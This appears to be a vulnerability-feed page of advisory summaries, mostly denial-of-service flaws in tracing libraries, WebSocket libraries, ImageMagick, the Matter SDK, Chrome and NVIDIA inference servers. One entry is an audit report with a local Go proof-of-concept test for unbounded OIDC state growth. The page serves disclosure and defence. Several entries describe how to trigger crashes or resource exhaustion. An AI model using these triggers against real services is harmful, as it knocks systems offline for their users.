Denial Of Service
Monthly
Remote unauthenticated Denial of Service in the Datadog.Trace .NET tracing library (versions before 3.43.0) arises because W3C baggage HTTP headers are parsed on the extract path without enforcing the DD_TRACE_BAGGAGE_MAX_ITEMS (default 64) or DD_TRACE_BAGGAGE_MAX_BYTES (default 8192) limits that are only applied during injection. An attacker can send a single request with a baggage header containing an arbitrarily large number of comma-separated key-value pairs, forcing the tracer to allocate a hash-map entry per pair and exhausting CPU and memory. Because the baggage propagation style is enabled by default, any internet-facing service instrumented with an affected tracer is exposed; there is no public exploit identified at time of analysis and the CVSS is 7.5 (A:H only).
Remote unauthenticated Denial of Service in the Datadog dd-trace-js Node.js tracing library (versions < 5.100.0) allows attackers to exhaust CPU and memory by sending an HTTP request with an oversized W3C 'baggage' header. Because the DD_TRACE_BAGGAGE_MAX_ITEMS (64) and DD_TRACE_BAGGAGE_MAX_BYTES (8192) caps were enforced only on injection and not on the extraction path, the tracer allocates a hash-map entry per comma-separated pair on every request. With baggage propagation enabled by default, any internet-facing instrumented service is exposed. CVSS 3.1 base score is 7.5 (A:H); there is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote denial of service in Datadog's dd-trace-py Python tracing library (versions before 4.8.2) lets unauthenticated attackers exhaust CPU and memory by sending oversized W3C 'baggage' HTTP headers. The DD_TRACE_BAGGAGE_MAX_ITEMS (64) and DD_TRACE_BAGGAGE_MAX_BYTES (8192) safeguards were enforced only on baggage injection, never on extraction, so a single crafted request with a huge number of comma-separated pairs forces the tracer to allocate a hash-map entry per pair on every request. Because the baggage propagation style is enabled by default, any reachable service instrumented with an affected tracer is exposed; no public exploit identified at time of analysis.
Remote denial of service in Datadog's dd-trace-java (dd-java-agent) tracing library affects any HTTP service instrumented with a version below 1.62.0 that has W3C baggage propagation enabled, which is the default. Because the DD_TRACE_BAGGAGE_MAX_ITEMS (64) and DD_TRACE_BAGGAGE_MAX_BYTES (8192) caps were enforced only on baggage injection and not on extraction, a remote unauthenticated attacker can send a single crafted 'baggage' header with a huge number of key-value pairs or one oversized value to exhaust CPU and memory. There is no public exploit identified at time of analysis and it is not on CISA KEV, but exploitation is trivially reliable (CVSS 7.5, AV:N/AC:L/PR:N).
Resource limit bypass in the websocket-driver npm library (versions < 0.7.5) allows WebSocket messages to exceed the application's configured maximum message size when the permessage-deflate compression extension is active. The size enforcement is applied to compressed frame length headers rather than the decompressed payload, meaning a highly compressed message can appear within limits on the wire but expand arbitrarily upon decompression. Vendor-released patch is available in version 0.7.5; no public exploit has been identified at time of analysis.
Memory exhaustion in the websocket-driver Ruby gem (versions prior to 0.8.1) allows a remote peer to crash or degrade a receiving process by sending an HTTP request or response with an arbitrarily large number of headers, which the parser accumulates without any size bound. Affected deployments are those using WebSocket::Driver.server() directly atop a raw TCP server (bypassing an HTTP framework), or applications using this library as a WebSocket client - standard HTTP framework integrations (Rails, Sinatra, Rack) are not in scope. No public exploit has been identified and the vulnerability is not listed in CISA KEV, but exploitation is mechanically trivial once a vulnerable deployment is identified, requiring only a crafted HTTP connection.
Resource exhaustion in the websocket-driver Ruby gem (faye/websocket-driver-ruby) allows any WebSocket peer to bypass a configured maximum message size when the permessage-deflate compression extension is in use. The size limit is enforced against the compressed frame length rather than the post-decompression size, enabling a decompression-bomb style attack where a small compressed payload expands far beyond the intended ceiling. Applications on versions below 0.8.1 silently accept oversized payloads, potentially exhausting server memory or CPU and causing a denial-of-service condition. No public exploit exists at time of analysis, but the attack class is well understood and low-complexity to implement.
Memory exhaustion in the Ruby websocket-driver gem (faye/websocket-driver-ruby) allows any network peer to crash the host process by abusing the draft WebSocket protocol's variable-length integer encoding. By streaming an indefinite sequence of bytes with values 0x80 or above in a frame length header, an attacker forces the parser to accumulate an ever-growing Ruby arbitrary-precision integer, consuming unbounded heap memory until the process is killed by the OS. The attack is bidirectional - a malicious server can target a client, or a malicious client can target a server - and no public exploit has been identified at time of analysis.
Arbitrary file read and denial of service in Wekan (open-source Meteor kanban board) before version 9.31 allows an authenticated board member to read any file the server process can access by supplying attacker-controlled versions.original.path and versions.original.storage values to the /attachments/insert DDP method. Because the server-side insert permission rule only validates board write access and the filesystem store never confirms the path stays within the storage root, a low-privileged user can exfiltrate sensitive host files or hang the process by pointing at special files like /dev/zero. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, but a fixing commit and release (v9.31) are public.
Resource exhaustion in Absolute Security Secure Access publisher (versions prior to 14.55) enables authenticated remote attackers holding valid tunnel credentials to trigger a non-persistent denial of service against the publisher component. The CVSS 4.0 score of 5.1 (Medium) reflects the constrained impact: availability loss is limited and self-recovering, with no confidentiality or integrity exposure. No public exploit code and no CISA KEV listing identified at time of analysis.
Heap overflow in Absolute Security Secure Access client certificate parsing causes a local denial of service. Versions prior to 14.55 are affected. An attacker who already holds local administrator privileges on a managed endpoint can trigger the overflow to crash the Secure Access client, effectively disabling it on that machine. No public exploit code has been identified, and this vulnerability is not listed in the CISA KEV catalog.
Stack-based buffer overflow in TDengine (open-source IoT time-series database) versions 3.4.1.6 and earlier allows an authenticated user to trigger a one-byte out-of-bounds write by submitting SQL containing crafted escape sequences (\%, \_, or \x), leading to denial of service and potentially remote code execution. The flaw sits in the SQL parser's trimString() routine, which validates only a single byte of remaining space in the tmpTokenBuf stack buffer before writing escape-processed data. There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV; it is fixed in version 3.4.1.14.
Denial of service in the Elixir/Erlang Hex package protobuf (>= 0.8.0, < 0.16.1) allows an unauthenticated remote attacker to crash any service that decodes untrusted protobuf messages into a self-referential or cyclic message type. Because Protobuf.Decoder performs unbounded, non-tail recursion over embedded message fields, a small request body (a few KB to a few MB) can nest a field hundreds of thousands to millions of levels deep, forcing the BEAM to retain one stack/heap frame per level until it exhausts memory and pins a scheduler; a handful of concurrent requests take the node offline. This is a request-amplification DoS with a publicly available proof-of-concept, but no CISA KEV listing and no evidence of active exploitation; no CVSS or EPSS score is provided in the source data.
Out-of-bounds write in the Zephyr RTOS ADIN2111/ADIN1110 single-pair Ethernet driver (eth_adin2111.c) lets an attacker on the same 10BASE-T1S/T1L segment corrupt kernel memory by sending an oversized frame in OPEN Alliance SPI mode. Because per-chunk length and chunk count (up to 255) come straight off the wire with no bounds check on the reassembly cursor, the RX offload thread writes attacker-controlled bytes-up to ~14.8 KB-past the fixed 1524-byte static buffer, enabling denial of service and potentially remote code execution. There is no public exploit identified at time of analysis; the flaw was introduced in commit 0ca8b0756b1 and shipped in v3.7.0 through v4.4.0.
Denial of service in the ws WebSocket library for Node.js (versions before 8.21.1) allows remote unauthenticated attackers to exhaust server heap memory by opening fragmented messages that are never completed. Because the fragment guard in lib/receiver.js only fires when the fragment count reaches maxFragments, an attacker can stream continuation frames (starting with a text frame carrying FIN=0) indefinitely, and each fragment is retained as a separate Buffer with per-object overhead until the process runs out of memory. No public exploit has been identified at time of analysis, and the flaw was disclosed by VulnCheck with a vendor patch already available.
Denial of service in F5 NGINX Ingress Controller allows an authenticated remote attacker holding write access to Ingress or TransportServer resources to crash the control plane by submitting a malformed resource. Because the offending resource persists in the cluster, the controller re-reads it and re-crashes, producing a durable crash loop rather than a one-time outage. There is no public exploit identified at time of analysis, and impact is confined to the control plane with no data plane or confidentiality/integrity exposure.
Memory-exhaustion denial of service in F5 BIG-IP affects any virtual server configured with an HTTP/2 profile, where a remote unauthenticated attacker sends undisclosed crafted requests that drive Traffic Management Microkernel (TMM) memory consumption upward until TMM restarts. This is a data-plane-only issue with no control-plane exposure, and it also impacts the BIG-IP Next family (Kubernetes, SPK, CNF). No public exploit has been identified at time of analysis, and it is not listed in CISA KEV; the vendor rates it CVSS 4.0 8.7 (High).
Unvalidated chown in Samba's pam_winbind module allows a local user with narrow sudo delegation to transfer ownership of the root filesystem directory to a system account, causing system-wide denial of service on Red Hat Enterprise Linux 6 through 10. When mkhomedir is enabled and a system account has its home directory set to '/', any PAM-triggered authentication event run as that account via sudo invokes the chown without path sanitization. The resulting ownership change breaks SSH, sudo, and package-manager functionality, though the 0555 permissions on RHEL prevent write access escalation, confining the impact to high-severity availability loss. No public exploit or CISA KEV listing is identified at time of analysis.
Memory leak in ImageMagick's ICON decoder exposes services that process user-supplied images to a potential denial of service. Both the 7.x and 6.x release branches are affected - specifically versions before 7.1.2-26 and 6.9.13-51 respectively. An unauthenticated remote attacker (per CVSS PR:N) who can supply a crafted ICON file to an ImageMagick-processing endpoint can repeatedly trigger allocation failures that are never cleaned up, gradually exhausting process memory. No public exploit or active exploitation has been identified at time of analysis.
Memory leak in ImageMagick's MIFF encoder (CWE-401) affects the 7.x branch before 7.1.2-26 and the 6.x branch before 6.9.13-51, enabling denial of service through resource exhaustion. When a memory allocation fails during MIFF image encoding, previously allocated buffers are not released, causing memory to accumulate across repeated processing calls. The CVSS 4.0 score of 2.1 and a local attack vector (AV:L) with high complexity (AC:H) and specific prerequisites (AT:P) signal a low-priority finding with no public exploit and no CISA KEV listing.
Memory leak in ImageMagick's YUV decoder (versions before 7.1.2-26 and 6.9.x before 6.9.13-51) enables remote denial of service by repeatedly submitting malformed YUV images that trigger a failed blob open, leaking heap memory on each decode attempt. No confidentiality or integrity impact applies; exposure is limited to availability of image-processing services that accept untrusted input. No public exploit code or active exploitation has been identified at time of analysis.
Memory leak in ImageMagick's TIFF encoder before version 7.1.2-26 enables denial of service via controlled memory allocation failures. An attacker who can submit TIFF images for processing can repeatedly trigger allocation failures, causing the encoder to leak memory without releasing it, ultimately exhausting available system memory. No public exploit has been identified at time of analysis, and the CVSS 4.0 score of 2.1 reflects the constrained local attack vector and low availability impact.
Memory leak in ImageMagick's JNG encoder before version 7.1.2-26 enables local resource exhaustion when malformed JNG files cause blob open failures without subsequent memory release. The flaw is classified CWE-401 and carries a CVSS 4.0 score of just 2.1, reflecting a local attack vector, high complexity, and availability-only impact - no confidentiality or integrity loss is possible. No public exploit code and no active exploitation (CISA KEV) have been identified, making this a low-priority finding relevant primarily to services that batch-process untrusted image files.
Use-after-free in ImageMagick's FreeType integration path allows remote denial of service against image processing pipelines using vulnerable 6.x or 7.x releases. When FreeType initialization fails during an image processing operation, the affected code path neglects to exit cleanly and continues referencing already-freed memory, causing process corruption or crash. No public exploit identified at time of analysis; the CVSS 4.0 score of 6.3 with AC:H and AT:P reflects meaningful preconditions required to trigger the failure path.
Heap-based buffer over-write in ImageMagick's X11 import functionality exposes local systems to heap memory corruption and denial of service when processing a crafted X11 window title. Affected versions span both the 7.x branch (before 7.1.2-26) and the legacy 6.x branch (before 6.9.13-51), covering a large installed base across Linux and Unix environments. No public exploit identified at time of analysis, and the narrow exploitation conditions - requiring local privileged access with X11 in scope - significantly constrain real-world risk despite the CWE-122 heap overflow class.
Memory exhaustion denial of service in ImageMagick through 7.1.2-18 arises from the ASHLAR coder failing to release a temporary image object when an internal action fails, allowing an attacker who can supply malicious ASHLAR files to a processing pipeline to cumulatively exhaust process memory. The CVSS 4.0 vector (AV:L/UI:P) confirms this is a local-vector attack requiring passive user or pipeline interaction to process the crafted file, not a remote unauthenticated scenario. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; confirmed fixed versions exist for Magick.NET NuGet packages at 14.11.1.
Denial of service in Red Hat OpenShift GitOps (Argo CD operator) lets a tenant who controls a namespace-scoped Argo CD instance delete a ClusterRole belonging to a cluster-scoped Argo CD instance by crafting a name collision. Because the ClusterRole reconciler skips ownership validation (CWE-862), a low-privileged tenant can disrupt a higher-privileged, cluster-wide GitOps instance across the trust boundary. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the cross-tenant scope change makes it a meaningful multi-tenancy integrity concern.
SQL injection in Apache Fineract's Office Search API (GET /api/v1/offices) in all versions up to and including 1.14.0 lets an authenticated user who holds the office-view permission inject arbitrary SQL through the orderBy request parameter. Because it bypasses the ColumnValidator hardening added for CVE-2024-32838, an attacker can run time-based blind SQL injection to exfiltrate database contents and, by launching concurrent injections that hold connections open, exhaust the database connection pool to cause denial of service. No public exploit identified at time of analysis; the flaw is documented via an oss-security advisory and an upstream fix pull request (apache/fineract #6048).
Local information disclosure and denial of service in the ASUS System Control Interface driver (v3 and earlier) and ASUS Business Manager lets a user already holding local administrator rights issue crafted IOCTL requests to read leftover sensitive data from kernel/driver buffers and, in severe cases, exhaust unthrottled resources to crash the host. The flaw stems from missing resource limits (CWE-770) combined with reuse of memory that still contains prior sensitive contents. There is no public exploit identified at time of analysis, and it is not listed in CISA KEV; ASUS self-reported and issued an advisory.
A stack overflow in the evaluate() function (editors/awk.c) of BusyBox commit 371fe9 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AWK script.
A heap overflow in the evalcommand() function (shell/ash.c) of Busybox v1.38.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.
An issue in EMQ NanoMQ v.0.24.9 allows a remote attacker to cause a denial of service via the nni_qos_db_set function in broker_tcp.c component
A use-after-free in the awk_sub() function (editors/awk.c) of Busybox v1.38.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted AWK script.
Buffer Overflow vulnerability in Tenda AC10 v3 (firmware V03.03.16.09) allows attackers to cause a permanent Denial of Service (DoS) or potentially execute remote code via the /cgi-bin/UploadCfg endpoint
A heap overflow in the ifsbreakup() function (shell/ash.c) of Busybox v1.38.0 allows attackers to cause a Denial of Service (DoS) via supplying a crafted input.
Incorrect access control in CAXPerts UniversalPlantViewer WebServices Server v2.7.6 allows any authenticated low-privilege user to invoke the /api/License/deactivateOffline endpoint and strip the server's license, rendering the service inoperable. The flaw (CWE-284) grants low-privileged accounts an action that should be restricted to administrative roles, providing a trivial denial-of-service primitive against industrial plant visualization infrastructure. No public exploit identified at time of analysis, though a researcher disclosure post on Medium appears to document the discovery.
Denial of service in the Matter SDK (connectedhomeip) before 1.4.0 lets a network attacker crash the device by sending an InvokeCommandRequest to a nonexistent endpoint/cluster (e.g. 0x34), which the interaction model treats as valid and then aborts on a VerifyOrDie assertion (SIGABRT). This is a reachable-assertion bug (CWE-617) with availability-only impact and no data compromise. No public exploit has been identified at time of analysis, and it is not listed in CISA KEV; the issue was acknowledged upstream and fixed in PR #37207.
Denial of service in the Matter SDK (connectedhomeip) before version 1.4.0 allows remote attackers to crash a Matter device or controller by sending a groupcast InvokeCommand message without an initialized destination group ID. The ExchangeManager reads the optional GroupId via GetDestinationGroupId().Value() without a HasValue() guard (CWE-457), triggering a SIGABRT abort. An upstream fix exists (commit 0360cc3, PR #36729), and no public exploit has been identified at time of analysis; this is a network-reachable, unauthenticated availability issue with no confidentiality or integrity impact.
Denial of service in the Matter SDK (connectedhomeip) before 1.4.0 lets a remote unauthenticated attacker crash a smart-home device by sending a crafted read request. The flaw lives in the ReadRevisionAttribute function, which is reused across multiple clusters (Channel, Account Login, TargetNavigator), so any device exposing those clusters is affected. No public exploit identified at time of analysis, and the issue is availability-only (no code execution or data exposure).
Remotely triggerable denial of service in the Matter SDK (connectedhomeip) before 1.4.2 lets an attacker crash devices by driving the Level Control cluster's periodic server tick into a failed assertion (currentLevel < maxLevel). Sending a MoveToLevel command and immediately writing OperationMode=2 in the Pump Configuration and Control cluster produces an inconsistent internal state that aborts the process. No public exploit has been identified at time of analysis, and the flaw is not listed in CISA KEV; CVSS is 7.5 with availability-only impact.
CAI Content Credentials is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Integer Overflow or Wraparound vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Improper Input Validation vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Improper Input Validation vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Improper Input Validation vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
CAI Content Credentials is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue does not require user interaction.
Twig is a template language for PHP. Prior to 3.26.0, the Twig sandbox does not prevent a template from consuming CPU, memory, or wall-clock time, even under the strictest allow-list, allowing untrusted templates to cause resource exhaustion. This issue is addressed in version 3.26.0 by documenting that the sandbox does not protect against resource exhaustion.
Remote denial of service in the Matter SDK (connectedhomeip) versions 1.3 through 1.4 lets unauthenticated attackers crash smart-home devices by racing a Level Control MoveToLevel command against a conflicting write to the Pump Configuration and Control cluster's OperationMode attribute, tripping a reachable assertion (minLevel < currentLevel) in the server tick callback. The abort forces the device to restart or hang, disrupting any product built on the affected SDK. No public exploit identified at time of analysis, and the issue is tracked via project-chip GitHub issue #38619 with no vendor-released patch identified.
When OIDC is enabled, `GET /ui/oidc/login` is reachable without authentication and is registered outside the Web UI rate-limited auth routes. Every request creates a fresh random OIDC state value and stores it in an in-memory map for `10m`. Expired states are swept lazily, but there is no rate limit or maximum live-state cap on the allocation path. An unauthenticated remote client can therefore grow `OIDC.states` for the full state TTL, bounded by request throughput rather than by configured auth rate limits. The OIDC login route is registered directly by `WithOIDC`: - `internal/web/web.go:153` registers `w.router.Get("/ui/oidc/login", o.HandleLogin)`. - `internal/web/web.go:154` rate-limits only `GET /ui/oidc/callback` with `w.rateLimitMiddleware("auth")`. The normal `/ui/*` route group applies rate limiting to login/register form submissions, but this direct registration happens outside that group: - `internal/web/web.go:287` through `internal/web/web.go:292` show the rate-limited local login, TOTP, and register POST routes. The OIDC login handler allocates persistent server-side state before redirecting to the configured identity provider: - `internal/web/oidc.go:105` defines `HandleLogin`. - `internal/web/oidc.go:106` creates a random state token. - `internal/web/oidc.go:112` calls `o.rememberState(state)`. - `internal/web/oidc.go:122` redirects to `o.oauth.AuthCodeURL(state)`. The state storage has a TTL but no maximum size: - `internal/web/oidc.go:24` through `internal/web/oidc.go:26` define `oidcStateTTL = 10 * time.Minute`. - `internal/web/oidc.go:353` through `internal/web/oidc.go:358` sweep expired states and then add the new state to `o.states`. - `internal/web/oidc.go:360` through `internal/web/oidc.go:373` delete only expired states. Because the route is unauthenticated and not rate-limited, a remote client can repeatedly request `/ui/oidc/login` and force live state entries to accumulate for ten minutes. OIDC must be enabled for exposure. No IdP callback, valid credentials, or user interaction is required to trigger the allocation. Affected version evidence: OIDC login support was introduced by commit `3f46685` (`feat(auth): add OIDC operator login (Keycloak/Authentik/Okta/...) (#24)`), and `git tag --contains 3f46685 --sort=version:refname` returns `v0.2.0` and every later release through `v0.3.8`. Pattern checks across all release tags showed the OIDC login route and state allocation are present in `v0.2.0` and in every `v0.3.x` release from `v0.3.0` to `v0.3.8`, and absent from `v0.1.x`. The current checkout at commit `d92dd9a60de291e2bc1caf73b4e9a99567b31ec0` (`git describe`: `v0.3.8-1-gd92dd9a`) remains affected. Safe local PoC run from a clean checkout at commit `d92dd9a60de291e2bc1caf73b4e9a99567b31ec0` on 2026-06-12. The PoC is a temporary Go test that uses `httptest` and an in-memory OIDC object; it does not start a real server, does not contact an IdP, and uses 1000 requests only to demonstrate linear state growth. 1. Create a temporary test file `internal/web/security_audit_poc_test.go` in package `web`. 2. Create a test Web UI with `newTestWeb(t)`. 3. Install a deliberately tiny auth rate limiter: group `auth` with rate `0.001` and burst `2`. 4. Attach an `OIDC` instance with an empty `states` map and an `oauth2.Config` whose authorization endpoint is `https://idp.example.test/auth`. 5. Send 1000 unauthenticated `GET /ui/oidc/login` requests from the same `RemoteAddr` through `w.ServeHTTP`. 6. Assert no request returns `429 Too Many Requests`, then inspect `o.stateCount()`. Command run: ```bash go test ./internal/web -run 'TestSecurityAuditPOC' -count=1 -v ``` Observed vulnerable output from this environment: ```text === RUN TestSecurityAuditPOC_OIDCLoginAllocatesUnrateLimitedState POC_OIDC_STATE_GROWTH attempts=1000 live_states=1000 ttl=10m0s rate_limit_group=auth_burst_2 --- PASS: TestSecurityAuditPOC_OIDCLoginAllocatesUnrateLimitedState (0.10s) ``` The meaningful control is that local login/register/TOTP POST routes and the OIDC callback are rate-limited: `internal/web/web.go:287` through `internal/web/web.go:292` and `internal/web/web.go:154`. The PoC specifically shows the OIDC login allocation route does not share that protection. After recording the output, the temporary test file was removed and `git status --short` returned clean. The PoC was re-run after drafting this report and produced the output shown above. In deployments with OIDC enabled, an unauthenticated remote client can cause application-layer memory growth by repeatedly requesting `/ui/oidc/login`. Each request stores a new state entry for ten minutes, and the growth is not bounded by the configured auth rate limiter or by a maximum map size. The demonstrated impact is availability degradation risk through retained in-memory state growth. The PoC used 1000 local requests to avoid disruptive load while proving the source-to-sink behavior (`1000` requests resulted in `1000` live states). Suggested remediation: apply the existing `auth` rate limiter to `GET /ui/oidc/login`, add a maximum number of live OIDC states per client and/or globally, and fail closed when the cap is reached. Add a regression test that attaches a low-burst auth limiter, sends repeated `GET /ui/oidc/login` requests from the same client, and expects `429` or bounded live-state count after the configured burst.
Denial of service in the Netty netty-codec-stomp module (versions 4.1.x up to 4.1.135.Final and 4.2.0.Alpha1 through 4.2.15.Final) allows a remote attacker to trigger an OutOfMemoryError and crash the JVM. The StompSubframeDecoder caps individual header line length via maxLineLength but never bounds the total header count or cumulative header size, so a single STOMP frame packed with thousands of short headers exhausts heap memory. Publicly available exploit code exists (a working client/server PoC is published in the GitHub Security Advisory), but there is no public evidence of active exploitation; EPSS/KEV signals are not present in the input.
Use after free in UI in Google Chrome on Linux prior to 150.0.7871.125 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
Use after free in Skia in Google Chrome prior to 150.0.7871.125 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in Core in Google Chrome on Windows prior to 150.0.7871.125 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in GPU in Google Chrome on Android prior to 150.0.7871.125 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in Ozone in Google Chrome prior to 150.0.7871.125 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Ozone in Google Chrome on Linux prior to 150.0.7871.125 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)
NVIDIA TensorRT-LLM contains a vulnerability in the OpenAI-compatible inference API, where an attacker could cause allocation of GPU resources without limits or throttling. A successful exploit of this vulnerability might lead to denial of service.
NVIDIA TensorRT-LLM contains a vulnerability in the OpenAI-compatible inference API where an attacker could trigger a reachable assertion in the sampler thread. A successful exploit of this vulnerability might lead to denial of service.
NVIDIA TensorRT-LLM for any platform contains a vulnerability in the gRPC server chat API endpoint, where an attacker could cause CWE-20 by local attack. A successful exploit of this vulnerability might lead to denial of service.
NVIDIA TensorRT-LLM for Linux contains a vulnerability in the multimodal media fetching functions, where a network-accessible attacker could cause server-side request forgery. A successful exploit of this vulnerability might lead to denial of service and information disclosure.
Missing authentication in NVIDIA TensorRT-LLM for Linux lets an attacker reach the disaggregated orchestrator's FastAPI server directly and read, write, or delete internal cluster state, resulting in information disclosure, data tampering, and denial of service. The flaw (CWE-306) affects the orchestration layer that coordinates disaggregated prefill/decode inference workers. No public exploit identified at time of analysis, and the CVSS 3.1 base score is 7.3 with a local attack vector despite the request-based nature of the issue.
Memory corruption in NVIDIA TensorRT-LLM allows an attacker with local access to trigger a write-what-where primitive (CWE-123), enabling arbitrary memory writes that can corrupt data, crash the inference service, or leak sensitive information. The flaw carries a CVSS 7.4 (High) score with a local attack vector and high attack complexity, and affects the TensorRT-LLM library used to build and serve optimized large-language-model inference on NVIDIA GPUs. There is no public exploit identified at time of analysis and the issue is not listed in CISA KEV.
Heap-based buffer overflow in NVIDIA TensorRT-LLM's tensor deserialization path lets an adjacent, unauthenticated attacker corrupt heap memory by supplying a crafted serialized tensor, potentially causing information disclosure, data tampering, or denial of service. All platforms running affected TensorRT-LLM versions are impacted. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV; NVIDIA rates exploitation as high-complexity (AC:H).
Local privilege-context deserialization in NVIDIA TensorRT-LLM lets an attacker who already has same-user access to a host running the inference stack abuse its inter-process communication layer to trigger unsafe object deserialization (CWE-502), potentially yielding code execution, information disclosure, data tampering, and denial of service. The flaw is vendor-reported by NVIDIA and carries a CVSS 3.1 base of 7.8 (AV:L), meaning it is not remotely reachable but converts existing local access into full compromise of the model-serving process. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Denial of service in NVIDIA Triton Inference Server on Linux allows remote unauthenticated attackers to exhaust host memory by triggering a memory leak (CWE-401, missing release of memory after effective lifetime), degrading or crashing the inference service. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N, A:H) indicates trivial network-reachable exploitation with no authentication and high availability impact, but no confidentiality or integrity exposure. No public exploit identified at time of analysis and the CVE is not listed in CISA KEV.
Denial of service in NVIDIA Triton Inference Server on Linux allows remote unauthenticated attackers to crash the service by triggering an uncaught exception (CWE-248), taking the model-serving endpoint offline. The flaw carries CVSS 7.5 with a pure availability impact (C:N/I:N/A:H) and no public exploit identified at time of analysis; it was reported by NVIDIA itself. No confidentiality or integrity compromise is involved — the sole consequence is loss of inference availability.
Denial of service in NVIDIA Triton Inference Server for Linux lets remote unauthenticated attackers exhaust server resources (CWE-400 uncontrolled resource consumption) and render the AI/ML inference endpoint unavailable, with no impact to confidentiality or integrity. The CVSS 3.1 base score is 7.5 (AV:N/AC:L/PR:N/UI:N/A:H), reflecting network-reachable, low-complexity, no-privilege exploitation. There is no public exploit identified at time of analysis and it is not listed in CISA KEV; no EPSS score was provided in the input.
Denial of service in NVIDIA Triton Inference Server for Linux allows a remote, unauthenticated attacker to disrupt availability by triggering use of an expired (stale) file descriptor. The flaw impacts availability only (no data exposure or code execution) and, per CVSS PR:N/UI:N, requires no authentication or user interaction. There is no public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV; no EPSS score was provided in the input.
A vulnerability was found in libsoup's HTTP/2 protocol implementation. The library fails to correctly release memory context blocks under specific stream termination conditions, such as when an HTTP/2 connection encounters window exhaustion or explicit stream resets. A remote, unauthenticated attacker acting as a malicious network peer can trick the connection engine into allocating stream states that are subsequently leaked during cleanup. Over a sustained period, this flaw allows the remote attacker to consume the system's heap allocations incrementally, triggering a denial of service (DoS) through an ultimate Out-of-Memory (OOM) application crash.
Remote denial of service in libsoup, the GNOME HTTP client/server library, allows unauthenticated attackers to crash any application using libsoup's WebSocket support by sending a single malformed control frame. The parser fails to enforce RFC 6455's 125-byte limit on PING/PONG/CLOSE control frames and mishandles the oversized payload instead of cleanly closing the connection, causing an internal processing crash. Red Hat reports the flaw across RHEL 6 through 10; no public exploit has been identified at time of analysis and no EPSS score was provided.
Denial of service in NVIDIA Triton Inference Server for Linux stems from a stack-based buffer overflow (CWE-121) reachable by remote, unauthenticated attackers over the network. Per the CVSS 3.1 vector, exploitation requires no privileges or user interaction and impacts only availability (A:H), with no confidentiality or integrity effect. There is no public exploit identified at time of analysis, and the CVE is not listed in CISA KEV; no EPSS score was provided in the input.
Denial of service in NVIDIA Triton Inference Server for Linux allows remote unauthenticated attackers to trigger uncontrolled resource consumption, exhausting server resources and rendering the model-serving endpoint unavailable. The flaw carries a CVSS 7.5 with a pure availability impact and no confidentiality or integrity effect; it was reported by NVIDIA, and there is no public exploit identified at time of analysis. No special access is required, but the concrete resource-exhaustion trigger is not detailed in the available data.
Denial of service in libsoup's WebSocket permessage-deflate implementation lets a remote, unauthenticated attacker crash applications by sending a small, highly compressed 'decompression bomb' that expands without bound during inflation, exhausting memory and triggering an Out-of-Memory kill. All Red Hat Enterprise Linux 6 through 10 ship the affected libsoup HTTP/WebSocket library, and client connections are especially exposed because the decompressed-size guard (max_total_message_size) is disabled by default for clients. There is no public exploit identified at time of analysis and this CVE is not listed in CISA KEV.
Network denial of service in Microsoft .NET 8.0, 9.0, and 10.0 (and the corresponding Visual Studio 2022/2026 tooling) allows an unauthorized remote attacker to exhaust system resources and render affected applications unavailable. The flaw stems from allocation of resources without limits or throttling, meaning a single crafted network interaction can trigger disproportionate resource consumption. Reported by Microsoft with a vendor patch available; no public exploit identified at time of analysis and it is not listed in CISA KEV.
Arbitrary file write in yutu, a Go-based YouTube CLI and MCP server, lets any caller of the built-in `caption-download` MCP tool place attacker-controlled bytes at any filesystem path the yutu process can write to. The vulnerable `Caption.Download()` calls `os.Create()` on the caller-supplied `file` parameter, bypassing the `YUTU_ROOT` (`pkg.Root`/`os.OpenRoot`) confinement that every other caption write path enforces. Publicly available exploit code exists (a self-contained Docker PoC ships with the advisory); the flaw is not in CISA KEV and no active exploitation is reported, and the vendor has released a fixed version (0.10.9-dev1).
Denial of service in Microsoft .NET (including .NET 8.0/9.0/10.0 and .NET Framework 3.5 through 4.8.1) lets a remote unauthenticated attacker exhaust server resources by sending crafted network traffic that triggers unbounded resource allocation. Rated CVSS 7.5 with availability-only impact, it affects default configurations of network-facing .NET applications; no public exploit identified at time of analysis and it is not listed in CISA KEV.
